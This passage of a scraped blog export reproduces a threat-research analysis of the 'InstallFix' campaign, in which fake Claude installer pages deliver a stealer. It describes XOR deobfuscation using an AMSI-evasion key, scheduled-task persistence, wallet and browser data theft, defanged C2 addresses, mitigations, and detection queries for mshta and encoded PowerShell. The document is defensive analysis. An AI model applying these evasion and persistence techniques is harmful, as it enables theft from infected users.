class=\"rte-red-bullet\"><b>\/cloude-…<\/b> <span>– remote payload path<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig21.png\" alt=\"Figure 21. A snippet of the obfuscated command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 21. A snippet of the obfuscated command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>During the fourth stage of execution (cloude-91267b64-989f-49b4-89b4-984e0154d4d1), an additional layer of obfuscation was observed. This indicates that the payload employs multiple stages of encoding or concealment to hinder analysis and evade detection<\/p>\n<p>To deobfuscate the byte, we need the key to be used in the XOR function, which will be stored in <i>$ISLuq0izl8<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig22.png\" alt=\"Figure 22. A snippet of the obfuscated logic for decoding the obfuscated commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 22. A snippet of the obfuscated logic for decoding the obfuscated commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig23.png\" alt=\"Figure 23. A snippet of the variable where the decoded result will be stored\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 23. A snippet of the variable where the decoded result will be stored<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>To produce the key, it concatenates all the characters, and the result will be stored in <i>$ISLuq0izl8<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig24.png\" alt=\"Figure 24. A snippet of the first character to be decoded via XOR function\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 24. A snippet of the first character to be decoded via XOR function<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div readability=\"21\">\n<p>As part of the deobfuscation process, the first character was decoded to derive the key required for further decryption. This step serves as an example of the underlying logic used to reconstruct the full payload from its obfuscated form.<\/p>\n<p><b>Logic to get the XOR KEY<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Combine numbers and remove the variables:<\/span><\/li>\n<\/ul>\n<p>24 + 48 = 72<br \/>39 \u2212 39 = 0<br \/>49 + 38 = 87<\/p>\n<p>72 \u2212 C \u2212 K \u2212 87 + C + K + 80<\/p>\n<p>\u2212C + C = 0<br \/>\u2212K + K = 0<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Remaining:<\/span><\/li>\n<\/ul>\n<p>72 \u2212 87 + 80 = 65 \u2192 <b>“A”<\/b><\/p>\n<p><b>From Decimal 65 = A<\/b><\/p>\n<p>Based on this logic, the result of the first character located on $euZ1AMZyMcJWItteQdCD is \u201cA\u201d.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig25.png\" alt=\"Figure 25. A snippet of the decoded XOR key needed to get the shellcode\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 25. A snippet of the decoded XOR key needed to get the shellcode<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Decoding and resolving all variables that are concatenated into <i>$ISLuq0izl8<\/i> reveals that the XOR key used in the obfuscation process is <i>AMSI_RESULT_NOT_DETECTED – UTF8<\/i>. This indicates the script is leveraging a known AMSI-related string as part of its deobfuscation or evasion technique.<b><\/b><\/p>\n<p>With the XOR key now obtained, we can proceed to deobfuscate the encoded bytes and continue with further analysis of the payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig26.png\" alt=\"Figure 26. A snippet of the Cyberchef Recipe to decode the bytes to get the shellcode payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 26. A snippet of the Cyberchef Recipe to decode the bytes to get the shellcode payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Based on the decryption routine, the data is first converted from decimal and Base64 formats, then XOR-decrypted using the key <i>\u201cAMSI_RESULT_NOT_DETECTED\u201d<\/i>. Following this process, the resulting output resolves into shellcode intended for in-memory execution.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig27.png\" alt=\"Figure 27. Shellcode that is designed to be loaded into memory for execution\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 27. Shellcode that is designed to be loaded into memory for execution<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>In addition to other indicators of compromise, scheduled tasks were observed being created on the host system. This behavior suggests that the malware is attempting to achieve persistence, allowing it to maintain ongoing connectivity and re-execute automatically, even after system reboots or user logouts.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig28.png\" alt=\"Figure 28. The scheduled task creation was successfully captured by TrendAI Vision One\u2122\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 28. The scheduled task creation was successfully captured by TrendAI Vision One\u2122<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\" readability=\"7\">\n<figure class=\"image-figure\" readability=\"4\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig29.png\" alt=\"Figure 29. The obfuscated command responsible for creating the scheduled task, which is used by the malware to establish persistence on the system\"> <\/p>\n<p><figcaption>Figure 29. The obfuscated command responsible for creating the scheduled task, which is used by the malware to establish persistence on the system<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Upon execution of the shellcode in memory, the system began exhibiting observable changes consistent with in-memory payload activity. The following artifacts and behaviors were identified during runtime analysis. The following event was observed:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig30.png\" alt=\"Figure 30. Behavior indicating that the malware is attempting to collect data related to e-wallet applications\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 30. Behavior indicating that the malware is attempting to collect data related to e-wallet applications<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig31.png\" alt=\"Figure 31. Behavior indicating that the malware is collecting browser data\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 31. Behavior indicating that the malware is collecting browser data<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>The outbound connections are 104[.]21[.]0[.]95 and 185[.]177[.]239[.]255. TCP send and TCP receive activity was observed on the infected host. This indicates that the malware is actively establishing network connections and exchanging data with external systems. Such activity suggests potential communication with command-and-control servers, data exfiltration, or coordination with other malicious infrastructure.<\/p>\n<p>Multiple outbound connections were observed during repeated execution of the payload. In this analysis, the payload was executed three times, with each execution generating different outbound network connections.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig32.png\" alt=\"Figure 32. A snippet of the attempt to connect to C&C connection\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 32. A snippet of the attempt to connect to C&C connection<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig33.png\" alt=\"Figure 33. The malware attempted to establish a connection to the IP address 77[.]91[.]97[.]244, which resolves to hosted-by[.]yeezyhost[.]net\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 33. The malware attempted to establish a connection to the IP address 77[.]91[.]97[.]244, which resolves to hosted-by[.]yeezyhost[.]net<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig34.png\" alt=\"Figure 34. A snippet of the Wireshark for unsuccessful connection\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 34. A snippet of the Wireshark for unsuccessful connection<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>All captured packets consist of TCP SYN requests to 77[.]91[.]97[.]244 over port 443 (HTTPS). The presence of multiple TCP retransmissions indicates that no SYN-ACK responses were received from the destination server, suggesting that the connection attempts were unsuccessful or destination IP address appears to be unreachable, suggesting it may be offline or non-responsive.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig35.jpg\" alt=\"Figure 35. An indicator linked to RedLine stealer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 35. An indicator linked to RedLine stealer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The InstallFix campaign reveals how cybercriminals are exploiting the popularity of AI tools to launch targeted, high-impact malware attacks. By disguising malicious installers as legitimate Claude AI downloads and using Google Ads as a means of distribution, attackers bypass both user skepticism and their machine\u2019s security controls. By employing techniques such as AMSI bypass, SSL certificate validation disabling, and scheduled task creation for persistence, the malware is able to evade detection and maintain access to infected systems. Organizations must remain vigilant against threats like this by making users aware of installation risks, monitoring for suspicious process and network activity, and prioritizing layered defenses.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>To mitigate the risks posed by campaigns like InstallFix, organizations should adopt proactive security measures and focus on user education. The following best practices are designed to help prevent malware infections, detect suspicious activity, and strengthen defenses against deceptive installer threats:<\/p>\n<p><b>Network protection<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Block access to known malicious domains and IP addresses associated with the campaign at your firewall or security gateway.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Use DNS filtering or a secure web gateway to help prevent users from reaching suspicious or newly registered domains.<\/span><\/li>\n<\/ul>\n<p><b>Endpoint security<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Limit or block the use of legacy scripting tools like mshta.exe unless absolutely necessary, as these are commonly abused by attackers.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Ensure your TrendAI endpoint protection solution is configured to automatically block or terminate suspicious behavior, not just alert.<\/span><\/li>\n<\/ul>\n<p><b>User awareness<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Educate users to avoid copying and running installation commands from unfamiliar websites, especially those reached via sponsored search results.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Encourage users to always verify that software download pages match the official vendor\u2019s website before installing anything.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Recommend using trusted package managers (such as npm, pip, brew, or winget) instead of manual installation scripts from third-party sites.<\/span><\/li>\n<\/ul>\n<p><b>Detection and response<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Stay up to date with the latest threat intelligence and apply detection rules or indicators of compromise (IOCs) relevant to ongoing campaigns.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.833014659018\">\n<div readability=\"35.472275334608\">\n<p><span class=\"body-subhead-title\">Hunting Queries<\/span><\/p>\n<p><b>TrendAI Vision One\u2122 Search App <\/b><\/p>\n<p>TrendAI Vision One\u2122 customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment. <\/p>\n<p><b>Full kill-chain correlation<\/b><\/p>\n<p>\/\/ Vision One XDR Search \u2014 pivot from mshta to PS to C2 on one endpoint<br \/>\/\/ Step 1: find hosts where mshta ran with malicious URL args<br \/>eventSubId:TELEMETRY_PROCESS_CREATE<br \/> AND processName:mshta.exe<br \/> AND (processCmd:*1-5-8[.]com* OR processCmd:*msixbundle*<br \/> OR processCmd:*get-version[.]com*)<\/p>\n<p>\/\/ Step 2: pivot on endpointHostname from above \u2014 find PS child and C2 beacon<br \/>endpointHostName:<HOSTNAME_FROM_STEP1><br \/> AND (<br \/> (eventSubId:TELEMETRY_PROCESS_CREATE<br \/> AND processName:powershell.exe<br \/> AND (processCmd:*-enc* OR processCmd:*IEX*))<br \/> OR<br \/> (eventSubId:TELEMETRY_NETWORK<br \/> AND request:*oakenfjrod[.]ru*)<br \/> )<\/p>\n<p><b> mshta.exe spawning shell \u2014 Vision One XDR Search<\/b><\/p>\n<p>eventSubId:TELEMETRY_PROCESS_CREATE<br \/> AND parentProcessName:mshta.exe<br \/> AND (processName:cmd.exe OR processName:powershell.exe<br \/> OR processName:wscript.exe OR processName:cscript.exe)<\/p>\n<p><b> Encoded PowerShell \/ IEX in command line<\/b><\/p>\n<p>eventSubId:TELEMETRY_PROCESS_CREATE<br \/> AND processName:powershell.exe<br \/> AND (processCmd:*-enc* OR processCmd:*-EncodedCommand*<br \/> OR processCmd:*IEX* OR processCmd:*Invoke-Expression*<br \/> OR processCmd:*AMSI_RESULT_NOT_DETECTED*)<\/p>\n<p>More hunting queries are available for TrendAI Vision One\u2122 with <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/threat-intelligence.html\" target=\"_blank\">Threat Intelligence Hub<\/a> entitlement enabled.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"29.708333333333\">\n<div readability=\"6.7083333333333\">\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/IOCS_InstallFix.txt\" target=\"_blank\">here<\/a>. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&C servers for additional payloads. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9509],"class_list":["post-60590","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research"],"yoast_head":"\n<title>InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-05T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\",\"datePublished\":\"2026-05-05T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"},\"wordCount\":3413,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\",\"name\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"datePublished\":\"2026-05-05T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/installfix_thunbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","og_locale":"en_US","og_type":"article","og_title":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2026-05-05T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise","datePublished":"2026-05-05T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"},"wordCount":3413,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","url":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","name":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity 